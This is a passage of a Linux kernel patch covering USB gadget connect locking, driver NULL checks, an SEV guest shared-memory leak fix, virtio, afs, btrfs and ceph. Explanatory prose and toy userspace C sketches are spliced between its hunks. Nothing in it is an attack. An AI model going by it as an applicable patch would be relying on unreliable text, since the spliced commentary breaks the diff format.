+- * for the current gadget driver so that UDC drivers don't need to.
++ * Enables the D+ (or potentially D-) pullup.  The host will start
++ * enumerating this gadget when the pullup is active and a VBUS session
++ * is active (the link is powered).
+  *
+  * Returns zero on success, else negative errno.
+  */
+-int usb_gadget_disconnect(struct usb_gadget *gadget)
++int usb_gadget_connect(struct usb_gadget *gadget)
++{
++	int ret;
++
++	mutex_lock(&gadget->udc->connect_lock);
++	ret = usb_gadget_connect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(usb_gadget_connect);
++
++/* Internal version of usb_gadget_disconnect needs to be called with connect_lock held. */
++static int usb_gadget_disconnect_locked(struct usb_gadget *gadget)
++	__must_hold(&gadget->udc->connect_lock)
+ {
+ 	int ret = 0;
+ 
+@@ -724,10 +736,12 @@ int usb_gadget_disconnect(struct usb_gadget *gadget)
+ 	if (!gadget->connected)
+ 		goto out;
+ 
+-	if (gadget->deactivated) {
++	if (gadget->deactivated || !gadget->udc->started) {
+ 		/*
+ 		 * If gadget is deactivated we only save new state.
+ 		 * Gadget will stay disconnected after activation.
++		 *
++		 * udc should have been started before the gadget is pulled down.
+ 		 */
+ 		gadget->connected = false;
+ 		goto out;
+@@ -747,6 +761,30 @@ out:
+ 
+ 	return ret;
+ }
++
++/**
++ * usb_gadget_disconnect - software-controlled disconnect from USB host
++ * @gadget:the peripheral being disconnected
++ *
++ * Disables the D+ (or potentially D-) pullup, which the host may see
++ * as a disconnect (when a VBUS session is active).  Not all systems
++ * support software pullup controls.
++ *
++ * Following a successful disconnect, invoke the ->disconnect() callback
++ * for the current gadget driver so that UDC drivers don't need to.
++ *
++ * Returns zero on success, else negative errno.
++ */
++int usb_gadget_disconnect(struct usb_gadget *gadget)
++{
++	int ret;
++
++	mutex_lock(&gadget->udc->connect_lock);
++	ret = usb_gadget_disconnect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
++
++	return ret;
++}
+ EXPORT_SYMBOL_GPL(usb_gadget_disconnect);
+ 
+ /**
+@@ -767,10 +805,11 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ 	if (gadget->deactivated)
+ 		goto out;
+ 
++	mutex_lock(&gadget->udc->connect_lock);
+ 	if (gadget->connected) {
+-		ret = usb_gadget_disconnect(gadget);
++		ret = usb_gadget_disconnect_locked(gadget);
+ 		if (ret)
+-			goto out;
++			goto unlock;
+ 
+ 		/*
+ 		 * If gadget was being connected before deactivation, we want
+@@ -780,6 +819,8 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ 	}
+ 	gadget->deactivated = true;
+ 
++unlock:
++	mutex_unlock(&gadget->udc->connect_lock);
+ out:
+ 	trace_usb_gadget_deactivate(gadget, ret);
+ 
+@@ -803,6 +844,7 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ 	if (!gadget->deactivated)
+ 		goto out;
+ 
++	mutex_lock(&gadget->udc->connect_lock);
+ 	gadget->deactivated = false;
+ 
+ 	/*
+@@ -810,7 +852,8 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ 	 * while it was being deactivated, we call usb_gadget_connect().
+ 	 */
+ 	if (gadget->connected)
+-		ret = usb_gadget_connect(gadget);
++		ret = usb_gadget_connect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
+ 
+ out:
+ 	trace_usb_gadget_activate(gadget, ret);
+@@ -1051,12 +1094,13 @@ EXPORT_SYMBOL_GPL(usb_gadget_set_state);
+ 
+ /* ------------------------------------------------------------------------- */
+ 
+-static void usb_udc_connect_control(struct usb_udc *udc)
++/* Acquire connect_lock before calling this function. */
++static void usb_udc_connect_control_locked(struct usb_udc *udc) __must_hold(&udc->connect_lock)
+ {
+-	if (udc->vbus)
+-		usb_gadget_connect(udc->gadget);
++	if (udc->vbus && udc->started)
++		usb_gadget_connect_locked(udc->gadget);
+ 	else
+-		usb_gadget_disconnect(udc->gadget);
++		usb_gadget_disconnect_locked(udc->gadget);
+ }
+ 
+ /**
+@@ -1072,10 +1116,12 @@ void usb_udc_vbus_handler(struct usb_gadget *gadget, bool status)
+ {
+ 	struct usb_udc *udc = gadget->udc;
+ 
++	mutex_lock(&udc->connect_lock);
+ 	if (udc) {
+ 		udc->vbus = status;
+-		usb_udc_connect_control(udc);
++		usb_udc_connect_control_locked(udc);
+ 	}
++	mutex_unlock(&udc->connect_lock);
+ }
+ EXPORT_SYMBOL_GPL(usb_udc_vbus_handler);
+ 
+@@ -1097,7 +1143,7 @@ void usb_gadget_udc_reset(struct usb_gadget *gadget,
+ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+ 
+ /**
+- * usb_gadget_udc_start - tells usb device controller to start up
++ * usb_gadget_udc_start_locked - tells usb device controller to start up
+  * @udc: The UDC to be started
+  *
+  * This call is issued by the UDC Class driver when it's about
+@@ -1108,8 +1154,11 @@ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+  * necessary to have it powered on.
+  *
+  * Returns zero on success, else negative errno.
++ *
++ * Caller should acquire connect_lock before invoking this function.
+  */
+-static inline int usb_gadget_udc_start(struct usb_udc *udc)
++static inline int usb_gadget_udc_start_locked(struct usb_udc *udc)
++	__must_hold(&udc->connect_lock)
+ {
+ 	int ret;
+ 
+@@ -1126,7 +1175,7 @@ static inline int usb_gadget_udc_start(struct usb_udc *udc)
+ }
+ 
+ /**
+- * usb_gadget_udc_stop - tells usb device controller we don't need it anymore
++ * usb_gadget_udc_stop_locked - tells usb device controller we don't need it anymore
+  * @udc: The UDC to be stopped
+  *
+  * This call is issued by the UDC Class driver after calling
+@@ -1135,8 +1184,11 @@ static inline int usb_gadget_udc_start(struct usb_udc *udc)
+  * The details are implementation specific, but it can go as
+  * far as powering off UDC completely and disable its data
+  * line pullups.
++ *
++ * Caller should acquire connect lock before invoking this function.
+  */
+-static inline void usb_gadget_udc_stop(struct usb_udc *udc)
++static inline void usb_gadget_udc_stop_locked(struct usb_udc *udc)
++	__must_hold(&udc->connect_lock)
+ {
+ 	if (!udc->started) {
+ 		dev_err(&udc->dev, "UDC had already stopped\n");
+@@ -1295,6 +1347,7 @@ int usb_add_gadget(struct usb_gadget *gadget)
+ 
+ 	udc->gadget = gadget;
+ 	gadget->udc = udc;
++	mutex_init(&udc->connect_lock);
+ 
+ 	udc->started = false;
+ 
+@@ -1496,11 +1549,15 @@ static int gadget_bind_driver(struct device *dev)
+ 	if (ret)
+ 		goto err_bind;
+ 
+-	ret = usb_gadget_udc_start(udc);
+-	if (ret)
++	mutex_lock(&udc->connect_lock);
++	ret = usb_gadget_udc_start_locked(udc);
++	if (ret) {
++		mutex_unlock(&udc->connect_lock);
+ 		goto err_start;
++	}
+ 	usb_gadget_enable_async_callbacks(udc);
+-	usb_udc_connect_control(udc);
++	usb_udc_connect_control_locked(udc);
++	mutex_unlock(&udc->connect_lock);
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 	return 0;
+@@ -1531,12 +1588,14 @@ static void gadget_unbind_driver(struct device *dev)
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 
+-	usb_gadget_disconnect(gadget);
++	mutex_lock(&udc->connect_lock);
++	usb_gadget_disconnect_locked(gadget);
+ 	usb_gadget_disable_async_callbacks(udc);
+ 	if (gadget->irq)
+ 		synchronize_irq(gadget->irq);
+ 	udc->driver->unbind(gadget);
+-	usb_gadget_udc_stop(udc);
++	usb_gadget_udc_stop_locked(udc);
++	mutex_unlock(&udc->connect_lock);
+ 
+ 	mutex_lock(&udc_lock);
+ 	driver->is_bound = false;
+@@ -1622,11 +1681,15 @@ static ssize_t soft_connect_store(struct device *dev,
+ 	}
+ 
+ 	if (sysfs_streq(buf, "connect")) {
+-		usb_gadget_udc_start(udc);
+-		usb_gadget_connect(udc->gadget);
++		mutex_lock(&udc->connect_lock);
++		usb_gadget_udc_start_locked(udc);
++		usb_gadget_connect_locked(udc->gadget);
++		mutex_unlock(&udc->connect_lock);
+ 	} else if (sysfs_streq(buf, "disconnect")) {
+-		usb_gadget_disconnect(udc->gadget);
+-		usb_gadget_udc_stop(udc);
++		mutex_lock(&udc->connect_lock);
++		usb_gadget_disconnect_locked(udc->gadget);
++		usb_gadget_udc_stop_locked(udc);
++		mutex_unlock(&udc->connect_lock);
+ 	} else {
+ 		dev_err(dev, "unsupported command '%s'\n", buf);
+ 		ret = -EINVAL;
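
The udc/core.c changes above consistently split each entry point into a *_locked
worker plus a thin public wrapper that is the only place connect_lock is taken.
A self-contained userspace sketch of that pattern, with pthreads standing in for
the kernel mutex and all type and function names invented for illustration:

#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>

struct udc_model {
	pthread_mutex_t connect_lock;
	bool started;
	bool connected;
};

/* Worker: caller must hold m->connect_lock. */
static int connect_locked(struct udc_model *m)
{
	if (m->connected)
		return 0;
	if (!m->started) {
		/* Record the desired state only; the pull-up is applied
		 * later, once the controller has been started. */
		m->connected = true;
		return 0;
	}
	m->connected = true;	/* a real driver would raise D+ here */
	return 0;
}

/* Public wrapper: the only place the lock is taken. */
static int model_connect(struct udc_model *m)
{
	pthread_mutex_lock(&m->connect_lock);
	int ret = connect_locked(m);
	pthread_mutex_unlock(&m->connect_lock);
	return ret;
}

int main(void)
{
	struct udc_model m = { PTHREAD_MUTEX_INITIALIZER, true, false };

	model_connect(&m);
	printf("connected=%d\n", m.connected);
	return 0;
}
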
+diff --git a/drivers/usb/gadget/udc/renesas_usb3.c b/drivers/usb/gadget/udc/renesas_usb3.c
+index 615ba0a6fbee1..32c9e369216c9 100644
+--- a/drivers/usb/gadget/udc/renesas_usb3.c
++++ b/drivers/usb/gadget/udc/renesas_usb3.c
+@@ -2596,6 +2596,7 @@ static int renesas_usb3_remove(struct platform_device *pdev)
+ 	debugfs_remove_recursive(usb3->dentry);
+ 	device_remove_file(&pdev->dev, &dev_attr_role);
+ 
++	cancel_work_sync(&usb3->role_work);
+ 	usb_role_switch_unregister(usb3->role_sw);
+ 
+ 	usb_del_gadget_udc(&usb3->gadget);
+diff --git a/drivers/usb/gadget/udc/tegra-xudc.c b/drivers/usb/gadget/udc/tegra-xudc.c
+index 76919d7570d23..3c7ffb35c35cd 100644
+--- a/drivers/usb/gadget/udc/tegra-xudc.c
++++ b/drivers/usb/gadget/udc/tegra-xudc.c
+@@ -2160,7 +2160,7 @@ static int tegra_xudc_gadget_vbus_draw(struct usb_gadget *gadget,
+ 
+ 	dev_dbg(xudc->dev, "%s: %u mA\n", __func__, m_a);
+ 
+-	if (xudc->curr_usbphy->chg_type == SDP_TYPE)
++	if (xudc->curr_usbphy && xudc->curr_usbphy->chg_type == SDP_TYPE)
+ 		ret = usb_phy_set_power(xudc->curr_usbphy, m_a);
+ 
+ 	return ret;
+diff --git a/drivers/usb/host/xhci-debugfs.c b/drivers/usb/host/xhci-debugfs.c
+index dc832ddf7033f..bd40caeeb21c6 100644
+--- a/drivers/usb/host/xhci-debugfs.c
++++ b/drivers/usb/host/xhci-debugfs.c
+@@ -133,6 +133,7 @@ static void xhci_debugfs_regset(struct xhci_hcd *xhci, u32 base,
+ 	regset->regs = regs;
+ 	regset->nregs = nregs;
+ 	regset->base = hcd->regs + base;
++	regset->dev = hcd->self.controller;
+ 
+ 	debugfs_create_regset32((const char *)rgs->name, 0444, parent, regset);
+ }
+diff --git a/drivers/usb/host/xhci-rcar.c b/drivers/usb/host/xhci-rcar.c
+index aef0258a7160d..98525704be9d4 100644
+--- a/drivers/usb/host/xhci-rcar.c
++++ b/drivers/usb/host/xhci-rcar.c
+@@ -75,7 +75,6 @@ MODULE_FIRMWARE(XHCI_RCAR_FIRMWARE_NAME_V3);
+ 
+ /* For soc_device_attribute */
+ #define RCAR_XHCI_FIRMWARE_V2   BIT(0) /* FIRMWARE V2 */
+-#define RCAR_XHCI_FIRMWARE_V3   BIT(1) /* FIRMWARE V3 */
+ 
+ static const struct soc_device_attribute rcar_quirks_match[]  = {
+ 	{
+@@ -147,8 +146,6 @@ static int xhci_rcar_download_firmware(struct usb_hcd *hcd)
+ 
+ 	if (quirks & RCAR_XHCI_FIRMWARE_V2)
+ 		firmware_name = XHCI_RCAR_FIRMWARE_NAME_V2;
+-	else if (quirks & RCAR_XHCI_FIRMWARE_V3)
+-		firmware_name = XHCI_RCAR_FIRMWARE_NAME_V3;
+ 	else
+ 		firmware_name = priv->firmware_name;
+ 
+diff --git a/drivers/usb/mtu3/mtu3_qmu.c b/drivers/usb/mtu3/mtu3_qmu.c
+index 2ea3157ddb6e2..e65586147965d 100644
+--- a/drivers/usb/mtu3/mtu3_qmu.c
++++ b/drivers/usb/mtu3/mtu3_qmu.c
+@@ -210,6 +210,7 @@ static struct qmu_gpd *advance_enq_gpd(struct mtu3_gpd_ring *ring)
+ 	return ring->enqueue;
+ }
+ 
++/* @dequeue may be NULL if ring is unallocated or freed */
+ static struct qmu_gpd *advance_deq_gpd(struct mtu3_gpd_ring *ring)
+ {
+ 	if (ring->dequeue < ring->end)
+@@ -484,7 +485,7 @@ static void qmu_done_tx(struct mtu3 *mtu, u8 epnum)
+ 	dev_dbg(mtu->dev, "%s EP%d, last=%p, current=%p, enq=%p\n",
+ 		__func__, epnum, gpd, gpd_current, ring->enqueue);
+ 
+-	while (gpd != gpd_current && !GET_GPD_HWO(gpd)) {
++	while (gpd && gpd != gpd_current && !GET_GPD_HWO(gpd)) {
+ 
+ 		mreq = next_request(mep);
+ 
+@@ -523,7 +524,7 @@ static void qmu_done_rx(struct mtu3 *mtu, u8 epnum)
+ 	dev_dbg(mtu->dev, "%s EP%d, last=%p, current=%p, enq=%p\n",
+ 		__func__, epnum, gpd, gpd_current, ring->enqueue);
+ 
+-	while (gpd != gpd_current && !GET_GPD_HWO(gpd)) {
++	while (gpd && gpd != gpd_current && !GET_GPD_HWO(gpd)) {
+ 
+ 		mreq = next_request(mep);
+ 
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index b7657984dd8df..6f532da59e08a 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -819,11 +819,7 @@ static void vhost_vdpa_unmap(struct vhost_vdpa *v,
+ 		if (!v->in_batch)
+ 			ops->set_map(vdpa, asid, iotlb);
+ 	}
+-	/* If we are in the middle of batch processing, delay the free
+-	 * of AS until BATCH_END.
+-	 */
+-	if (!v->in_batch && !iotlb->nmaps)
+-		vhost_vdpa_remove_as(v, asid);
++
+ }
+ 
+ static int vhost_vdpa_va_map(struct vhost_vdpa *v,
+@@ -1080,8 +1076,6 @@ static int vhost_vdpa_process_iotlb_msg(struct vhost_dev *dev, u32 asid,
+ 		if (v->in_batch && ops->set_map)
+ 			ops->set_map(vdpa, asid, iotlb);
+ 		v->in_batch = false;
+-		if (!iotlb->nmaps)
+-			vhost_vdpa_remove_as(v, asid);
+ 		break;
+ 	default:
+ 		r = -EINVAL;
+diff --git a/drivers/video/fbdev/mmp/hw/mmp_ctrl.c b/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
+index a9df8ee798102..51fbf02a03430 100644
+--- a/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
++++ b/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
+@@ -514,9 +514,9 @@ static int mmphw_probe(struct platform_device *pdev)
+ 	/* get clock */
+ 	ctrl->clk = devm_clk_get(ctrl->dev, mi->clk_name);
+ 	if (IS_ERR(ctrl->clk)) {
++		ret = PTR_ERR(ctrl->clk);
+ 		dev_err_probe(ctrl->dev, ret,
+ 			      "unable to get clk %s\n", mi->clk_name);
+-		ret = -ENOENT;
+ 		goto failed;
+ 	}
+ 	clk_prepare_enable(ctrl->clk);
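
The mmp_ctrl fix above is the usual ERR_PTR idiom: capture PTR_ERR() from the
returned pointer before reporting it, instead of overwriting the real reason
with a blanket -ENOENT. A simplified userspace rendering of that encoding (the
helpers below mimic, but are not, the kernel's err.h; the clock getter is fake):

#include <errno.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_ERRNO 4095

static inline void *ERR_PTR(long err) { return (void *)err; }
static inline long PTR_ERR(const void *p) { return (long)p; }
static inline int IS_ERR(const void *p)
{
	return (uintptr_t)p >= (uintptr_t)-MAX_ERRNO;
}

/* Stand-in for devm_clk_get() failing with a specific reason. */
static void *fake_clk_get(void)
{
	return ERR_PTR(-ENODEV);
}

int main(void)
{
	void *clk = fake_clk_get();
	int ret = 0;

	if (IS_ERR(clk)) {
		ret = (int)PTR_ERR(clk);	/* keep the real errno */
		fprintf(stderr, "unable to get clk: %d\n", ret);
	}
	return ret ? 1 : 0;
}
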
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 741d12f75726c..9e172f66a8edb 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -46,7 +46,15 @@ struct snp_guest_dev {
+ 
+ 	void *certs_data;
+ 	struct snp_guest_crypto *crypto;
++	/* request and response are in unencrypted memory */
+ 	struct snp_guest_msg *request, *response;
++
++	/*
++	 * Avoid information leakage by double-buffering shared messages
++	 * in fields that are in regular encrypted memory.
++	 */
++	struct snp_guest_msg secret_request, secret_response;
++
+ 	struct snp_secrets_page_layout *layout;
+ 	struct snp_req_data input;
+ 	u32 *os_area_msg_seqno;
+@@ -268,14 +276,17 @@ static int dec_payload(struct snp_guest_dev *snp_dev, struct snp_guest_msg *msg,
+ static int verify_and_dec_payload(struct snp_guest_dev *snp_dev, void *payload, u32 sz)
+ {
+ 	struct snp_guest_crypto *crypto = snp_dev->crypto;
+-	struct snp_guest_msg *resp = snp_dev->response;
+-	struct snp_guest_msg *req = snp_dev->request;
++	struct snp_guest_msg *resp = &snp_dev->secret_response;
++	struct snp_guest_msg *req = &snp_dev->secret_request;
+ 	struct snp_guest_msg_hdr *req_hdr = &req->hdr;
+ 	struct snp_guest_msg_hdr *resp_hdr = &resp->hdr;
+ 
+ 	dev_dbg(snp_dev->dev, "response [seqno %lld type %d version %d sz %d]\n",
+ 		resp_hdr->msg_seqno, resp_hdr->msg_type, resp_hdr->msg_version, resp_hdr->msg_sz);
+ 
++	/* Copy response from shared memory to encrypted memory. */
++	memcpy(resp, snp_dev->response, sizeof(*resp));
++
+ 	/* Verify that the sequence counter is incremented by 1 */
+ 	if (unlikely(resp_hdr->msg_seqno != (req_hdr->msg_seqno + 1)))
+ 		return -EBADMSG;
+@@ -299,7 +310,7 @@ static int verify_and_dec_payload(struct snp_guest_dev *snp_dev, void *payload,
+ static int enc_payload(struct snp_guest_dev *snp_dev, u64 seqno, int version, u8 type,
+ 			void *payload, size_t sz)
+ {
+-	struct snp_guest_msg *req = snp_dev->request;
++	struct snp_guest_msg *req = &snp_dev->secret_request;
+ 	struct snp_guest_msg_hdr *hdr = &req->hdr;
+ 
+ 	memset(req, 0, sizeof(*req));
+@@ -419,13 +430,21 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	if (!seqno)
+ 		return -EIO;
+ 
++	/* Clear shared memory's response for the host to populate. */
+ 	memset(snp_dev->response, 0, sizeof(struct snp_guest_msg));
+ 
+-	/* Encrypt the userspace provided payload */
++	/* Encrypt the userspace provided payload in snp_dev->secret_request. */
+ 	rc = enc_payload(snp_dev, seqno, msg_ver, type, req_buf, req_sz);
+ 	if (rc)
+ 		return rc;
+ 
++	/*
++	 * Write the fully encrypted request to the shared unencrypted
++	 * request page.
++	 */
++	memcpy(snp_dev->request, &snp_dev->secret_request,
++	       sizeof(snp_dev->secret_request));
++
+ 	rc = __handle_guest_request(snp_dev, exit_code, fw_err);
+ 	if (rc) {
+ 		if (rc == -EIO && *fw_err == SNP_GUEST_REQ_INVALID_LEN)
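
The sev-guest change above is a classic double-buffering defense: messages are
composed and verified only in private (encrypted) memory, and cross the shared
page in whole-message memcpy() calls, so the host cannot race field-by-field
validation. A toy userspace model of the idea (static buffers stand in for the
shared pages, and the echoing "hypervisor" is invented):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct msg {
	uint64_t seqno;
	uint8_t payload[32];
};

/* Stand-ins for the shared, host-visible request/response pages. */
static struct msg shared_req, shared_resp;

static int roundtrip(const struct msg *priv_req, struct msg *priv_resp)
{
	/* The host only ever sees a fully composed request. */
	memcpy(&shared_req, priv_req, sizeof(shared_req));

	/* A real guest would issue the VM exit here; fake an echo. */
	shared_resp = shared_req;
	shared_resp.seqno++;

	/* Snapshot the response before validating it, so the host cannot
	 * change fields between the check and the use. */
	memcpy(priv_resp, &shared_resp, sizeof(*priv_resp));
	return priv_resp->seqno == priv_req->seqno + 1 ? 0 : -1;
}

int main(void)
{
	struct msg req = { .seqno = 7 }, resp;

	printf("ok=%d\n", roundtrip(&req, &resp) == 0);
	return 0;
}
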
+diff --git a/drivers/virtio/virtio_ring.c b/drivers/virtio/virtio_ring.c
+index 2e7689bb933b8..90d514c141794 100644
+--- a/drivers/virtio/virtio_ring.c
++++ b/drivers/virtio/virtio_ring.c
+@@ -848,6 +848,14 @@ static void virtqueue_disable_cb_split(struct virtqueue *_vq)
+ 
+ 	if (!(vq->split.avail_flags_shadow & VRING_AVAIL_F_NO_INTERRUPT)) {
+ 		vq->split.avail_flags_shadow |= VRING_AVAIL_F_NO_INTERRUPT;
++
++		/*
++		 * If device triggered an event already it won't trigger one again:
++		 * no need to disable.
++		 */
++		if (vq->event_triggered)
++			return;
++
+ 		if (vq->event)
+ 			/* TODO: this is a hack. Figure out a cleaner value to write. */
+ 			vring_used_event(&vq->split.vring) = 0x0;
+@@ -1687,6 +1695,14 @@ static void virtqueue_disable_cb_packed(struct virtqueue *_vq)
+ 
+ 	if (vq->packed.event_flags_shadow != VRING_PACKED_EVENT_FLAG_DISABLE) {
+ 		vq->packed.event_flags_shadow = VRING_PACKED_EVENT_FLAG_DISABLE;
++
++		/*
++		 * If device triggered an event already it won't trigger one again:
++		 * no need to disable.
++		 */
++		if (vq->event_triggered)
++			return;
++
+ 		vq->packed.vring.driver->flags =
+ 			cpu_to_le16(vq->packed.event_flags_shadow);
+ 	}
+@@ -2309,12 +2325,6 @@ void virtqueue_disable_cb(struct virtqueue *_vq)
+ {
+ 	struct vring_virtqueue *vq = to_vvq(_vq);
+ 
+-	/* If device triggered an event already it won't trigger one again:
+-	 * no need to disable.
+-	 */
+-	if (vq->event_triggered)
+-		return;
+-
+ 	if (vq->packed_ring)
+ 		virtqueue_disable_cb_packed(_vq);
+ 	else
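
Note the ordering in the virtio_ring hunks above: the event_triggered early
return now happens after the flags shadow is updated, so the driver's cached
state stays consistent even when the device-visible write is skipped. A small
sketch of that shadow-then-maybe-skip ordering (types and names are illustrative
only, not the vring layout):

#include <stdbool.h>
#include <stdio.h>

struct vq_model {
	unsigned int flags_shadow;	/* driver's cached flags */
	unsigned int device_flags;	/* what the device would read */
	bool event_triggered;
};

#define F_NO_INTERRUPT 0x1u

static void disable_cb(struct vq_model *vq)
{
	if (!(vq->flags_shadow & F_NO_INTERRUPT)) {
		/* Always keep the shadow current... */
		vq->flags_shadow |= F_NO_INTERRUPT;

		/* ...but skip the device update if an event already
		 * fired: it will not fire again anyway. */
		if (vq->event_triggered)
			return;

		vq->device_flags = vq->flags_shadow;
	}
}

int main(void)
{
	struct vq_model vq = { .event_triggered = true };

	disable_cb(&vq);
	printf("shadow=%#x device=%#x\n", vq.flags_shadow, vq.device_flags);
	return 0;
}
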
+diff --git a/drivers/xen/pcpu.c b/drivers/xen/pcpu.c
+index fd3a644b08559..b3e3d1bb37f3e 100644
+--- a/drivers/xen/pcpu.c
++++ b/drivers/xen/pcpu.c
+@@ -58,6 +58,7 @@ struct pcpu {
+ 	struct list_head list;
+ 	struct device dev;
+ 	uint32_t cpu_id;
++	uint32_t acpi_id;
+ 	uint32_t flags;
+ };
+ 
+@@ -249,6 +250,7 @@ static struct pcpu *create_and_register_pcpu(struct xenpf_pcpuinfo *info)
+ 
+ 	INIT_LIST_HEAD(&pcpu->list);
+ 	pcpu->cpu_id = info->xen_cpuid;
++	pcpu->acpi_id = info->acpi_id;
+ 	pcpu->flags = info->flags;
+ 
+ 	/* Need hold on xen_pcpu_lock before pcpu list manipulations */
+@@ -381,3 +383,21 @@ err1:
+ 	return ret;
+ }
+ arch_initcall(xen_pcpu_init);
++
++#ifdef CONFIG_ACPI
++bool __init xen_processor_present(uint32_t acpi_id)
++{
++	const struct pcpu *pcpu;
++	bool online = false;
++
++	mutex_lock(&xen_pcpu_lock);
++	list_for_each_entry(pcpu, &xen_pcpus, list)
++		if (pcpu->acpi_id == acpi_id) {
++			online = pcpu->flags & XEN_PCPU_FLAGS_ONLINE;
++			break;
++		}
++	mutex_unlock(&xen_pcpu_lock);
++
++	return online;
++}
++#endif
+diff --git a/fs/Makefile b/fs/Makefile
+index 4dea17840761a..80ab0154419ec 100644
+--- a/fs/Makefile
++++ b/fs/Makefile
+@@ -6,7 +6,6 @@
+ # Rewritten to use lists instead of if-statements.
+ # 
+ 
+-obj-$(CONFIG_SYSCTL)		+= sysctls.o
+ 
+ obj-y :=	open.o read_write.o file_table.o super.o \
+ 		char_dev.o stat.o exec.o pipe.o namei.o fcntl.o \
+@@ -49,7 +48,7 @@ obj-$(CONFIG_FS_MBCACHE)	+= mbcache.o
+ obj-$(CONFIG_FS_POSIX_ACL)	+= posix_acl.o
+ obj-$(CONFIG_NFS_COMMON)	+= nfs_common/
+ obj-$(CONFIG_COREDUMP)		+= coredump.o
+-obj-$(CONFIG_SYSCTL)		+= drop_caches.o
++obj-$(CONFIG_SYSCTL)		+= drop_caches.o sysctls.o
+ 
+ obj-$(CONFIG_FHANDLE)		+= fhandle.o
+ obj-y				+= iomap/
+diff --git a/fs/afs/dir.c b/fs/afs/dir.c
+index 104df2964225c..f73b2f62afaae 100644
+--- a/fs/afs/dir.c
++++ b/fs/afs/dir.c
+@@ -274,6 +274,7 @@ static struct afs_read *afs_read_dir(struct afs_vnode *dvnode, struct key *key)
+ 	loff_t i_size;
+ 	int nr_pages, i;
+ 	int ret;
++	loff_t remote_size = 0;
+ 
+ 	_enter("");
+ 
+@@ -288,6 +289,8 @@ static struct afs_read *afs_read_dir(struct afs_vnode *dvnode, struct key *key)
+ 
+ expand:
+ 	i_size = i_size_read(&dvnode->netfs.inode);
++	if (i_size < remote_size)
++		i_size = remote_size;
+ 	if (i_size < 2048) {
+ 		ret = afs_bad(dvnode, afs_file_error_dir_small);
+ 		goto error;
+@@ -363,6 +366,7 @@ expand:
+ 			 * buffer.
+ 			 */
+ 			up_write(&dvnode->validate_lock);
++			remote_size = req->file_size;
+ 			goto expand;
+ 		}
+ 
+diff --git a/fs/afs/inode.c b/fs/afs/inode.c
+index 6d3a3dbe49286..5921dd3687e39 100644
+--- a/fs/afs/inode.c
++++ b/fs/afs/inode.c
+@@ -230,6 +230,7 @@ static void afs_apply_status(struct afs_operation *op,
+ 			set_bit(AFS_VNODE_ZAP_DATA, &vnode->flags);
+ 		}
+ 		change_size = true;
++		data_changed = true;
+ 	} else if (vnode->status.type == AFS_FTYPE_DIR) {
+ 		/* Expected directory change is handled elsewhere so
+ 		 * that we can locally edit the directory and save on a
+@@ -449,7 +450,7 @@ static void afs_get_inode_cache(struct afs_vnode *vnode)
+ 				    0 : FSCACHE_ADV_SINGLE_CHUNK,
+ 				    &key, sizeof(key),
+ 				    &aux, sizeof(aux),
+-				    vnode->status.size));
++				    i_size_read(&vnode->netfs.inode)));
+ #endif
+ }
+ 
+@@ -765,6 +766,13 @@ int afs_getattr(struct user_namespace *mnt_userns, const struct path *path,
+ 		if (test_bit(AFS_VNODE_SILLY_DELETED, &vnode->flags) &&
+ 		    stat->nlink > 0)
+ 			stat->nlink -= 1;
++
++		/* Lie about the size of directories.  We maintain a locally
++		 * edited copy and may make different allocation decisions on
++		 * it, but we need to give userspace the server's size.
++		 */
++		if (S_ISDIR(inode->i_mode))
++			stat->size = vnode->netfs.remote_i_size;
+ 	} while (need_seqretry(&vnode->cb_lock, seq));
+ 
+ 	done_seqretry(&vnode->cb_lock, seq);
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index fe2fb81da46ba..0cebc203c4ccc 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -4050,6 +4050,11 @@ static long btrfs_ioctl_scrub(struct file *file, void __user *arg)
+ 	if (IS_ERR(sa))
+ 		return PTR_ERR(sa);
+ 
++	if (sa->flags & ~BTRFS_SCRUB_SUPPORTED_FLAGS) {
++		ret = -EOPNOTSUPP;
++		goto out;
++	}
++
+ 	if (!(sa->flags & BTRFS_SCRUB_READONLY)) {
+ 		ret = mnt_want_write_file(file);
+ 		if (ret)
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index 795fd6d84bde0..faf1178021123 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -430,7 +430,7 @@ void ceph_reservation_status(struct ceph_fs_client *fsc,
+  *
+  * Called with i_ceph_lock held.
+  */
+-static struct ceph_cap *__get_cap_for_mds(struct ceph_inode_info *ci, int mds)
++struct ceph_cap *__get_cap_for_mds(struct ceph_inode_info *ci, int mds)
+ {
+ 	struct ceph_cap *cap;
+ 	struct rb_node *n = ci->i_caps.rb_node;
+diff --git a/fs/ceph/debugfs.c b/fs/ceph/debugfs.c
+index bec3c4549c07d..3904333fa6c38 100644
+--- a/fs/ceph/debugfs.c
++++ b/fs/ceph/debugfs.c
+@@ -248,14 +248,20 @@ static int metrics_caps_show(struct seq_file *s, void *p)
+ 	return 0;
+ }
+ 
+-static int caps_show_cb(struct inode *inode, struct ceph_cap *cap, void *p)
